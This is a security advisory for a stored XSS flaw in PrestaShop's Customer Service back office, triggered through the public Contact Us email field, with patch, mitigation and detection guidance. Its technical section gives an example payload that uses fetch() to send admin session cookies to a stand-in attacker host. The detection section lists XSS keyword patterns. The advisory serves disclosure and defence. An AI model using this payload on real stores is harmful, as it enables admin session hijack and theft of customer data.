CVE-2026-44212: PrestaShop Stored XSS Targets Back-Office Admins
A critical stored Cross-Site Scripting (XSS) vulnerability has been disclosed in PrestaShop, the widely deployed open-source e-commerce platform, tracked as CVE-2026-44212 with a CVSS score of 9.3 (Critical). The flaw exists in the back-office Customer Service view and allows an unauthenticated external attacker to inject malicious JavaScript into the application by submitting the public Contact Us form with a specially crafted email address.
The vulnerability is patched in PrestaShop 8.2.6 and 9.1.1. Store operators running earlier versions are exposed.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-44212 |
| CVSS Score | 9.3 (Critical) |
| CWE Classification | CWE-79 — Improper Neutralization of Input During Web Page Generation (XSS) |
| Affected Software | PrestaShop (open source e-commerce) |
| Affected Versions | < 8.2.6, < 9.1.1 |
| Fixed Versions | 8.2.6, 9.1.1 |
| Attack Vector | Network — unauthenticated attacker submits Contact Us form |
| Authentication Required | None (attacker perspective) |
| User Interaction | Required — back-office admin must view the Customer Service thread |
| In-the-Wild Exploitation | Unknown at time of disclosure |
Technical Background
PrestaShop's Customer Service module aggregates messages from various sources, including submissions from the public-facing Contact Us form. When a customer submits a message, the associated contact data — including the sender's email address — is stored in the database and rendered in the back-office Customer Service view for administrator review.
The vulnerability arises because the email address field from Contact Us submissions is not properly sanitized or escaped before being rendered in the back-office interface. An attacker can craft a malicious email address containing an XSS payload (e.g., attacker@example.com<img src=x onerror="fetch('https://c2.attacker.example/'+document.cookie)">), which is stored in the database and executed in the browser of any administrator who views the associated Customer Service thread.
This is a stored (persistent) XSS vulnerability — the payload persists in the database and fires every time an administrator views the affected Customer Service message, without any further action from the attacker.
Attack Flow
1. Attacker submits the PrestaShop Contact Us form with a malicious email address
containing an embedded XSS payload
2. PrestaShop stores the submission (including the unsanitized email) in the database
as a Customer Service message thread
3. A back-office administrator views the Customer Service panel to review customer
inquiries — standard daily workflow for store operators
4. The unsanitized email address is rendered in the administrator's browser,
causing the embedded JavaScript payload to execute
5. Payload options include:
- Session cookie theft (admin session hijack)
- CSRF actions under the admin's authenticated context
- Keylogging of back-office input fields
- Credential exfiltration via fetch() to attacker-controlled server
- Creation of backdoor admin accounts
6. Attacker receives stolen session tokens or credentials and achieves
unauthenticated administrative access to the PrestaShop storeWhy This Is Critical (CVSS 9.3)
The high CVSS score reflects several compounding factors:
- No authentication required to inject the payload — the Contact Us form is fully public
- Administrative target — the payload executes in an administrator's browser session with full back-office privileges
- Persistent storage — the payload fires on every view, increasing the probability of successful exploitation
- Broad attack surface — Customer Service is a core back-office feature used regularly by store operators
- Full store compromise potential — a hijacked admin session provides access to all customer data, order history, payment configurations, and the ability to inject malicious code into the store's frontend
Affected Versions
The vulnerability affects PrestaShop in the following version ranges:
| Branch | Affected | Patched |
|---|---|---|
| 8.x | < 8.2.6 | 8.2.6+ |
| 9.x | < 9.1.1 | 9.1.1+ |
PrestaShop operators running any 8.x version below 8.2.6, or any 9.x version below 9.1.1, should treat this as an urgent update.
Remediation
Immediate: Update PrestaShop
# Check current PrestaShop version
php bin/console prestashop:version
# Update via Composer (if managing via Composer)
composer update prestashop/prestashop
# Or download the patched release from PrestaShop GitHub
# https://github.com/PrestaShop/PrestaShop/releasesUpdate via the PrestaShop Back-Office > Advanced Parameters > Updates module if running a standard installation.
Target versions:
- 8.x stores: Update to 8.2.6 or later
- 9.x stores: Update to 9.1.1 or later
Interim Mitigations (Pre-Patch)
If immediate patching is not possible:
- Restrict back-office access by IP allowlist — use Nginx/Apache IP restrictions or a VPN to ensure only trusted IPs can reach the
/adminpath - Disable the Customer Service module temporarily if not in active use (
Back-Office > Modules > Customer Service > Disable) - Enable a WAF with XSS filtering rules to intercept malicious Contact Us submissions at the network edge
- Monitor Contact Us submissions for anomalous email fields before opening them in the back-office
Detection
Review recent Contact Us submissions for suspicious email addresses:
-- Query PrestaShop database for suspicious email addresses in customer threads
SELECT id_customer_thread, email, date_add
FROM ps_customer_thread
WHERE email REGEXP '<|script|onerror|onload|javascript:'
ORDER BY date_add DESC
LIMIT 50;Check web server access logs for unusual Contact Us form submissions:
# Look for suspicious payloads in POST requests to the contact form
grep -i "onerror\|onload\|javascript:\|<script" /var/log/nginx/access.log | \
grep "contact" | tail -50Impact Assessment
| Impact Area | Description |
|---|---|
| Admin Session Hijack | Stolen session cookie enables full back-office access without credentials |
| Customer Data Exposure | Admin access exposes all customer PII, order history, payment data |
| Store Defacement | Attacker-controlled admin can modify storefront content and inject malicious JS |
| Payment Skimming | Malicious JS injected via admin access could add checkout skimmers |
| Persistence | Payload fires repeatedly without further attacker interaction |
| Supply Chain Risk | Compromised store could serve malware to customers |
Key Takeaways
- CVE-2026-44212 is a CVSS 9.3 Critical stored XSS in PrestaShop's Customer Service back-office view, triggered by unsanitized Contact Us form submissions
- No authentication required — any internet user can submit the malicious payload via the public contact form
- Update immediately to PrestaShop 8.2.6+ or 9.1.1+ to remediate the vulnerability
- Restrict back-office access by IP as an interim measure if patching is delayed
- Audit recent Customer Service threads for suspicious email addresses that may indicate prior exploitation attempts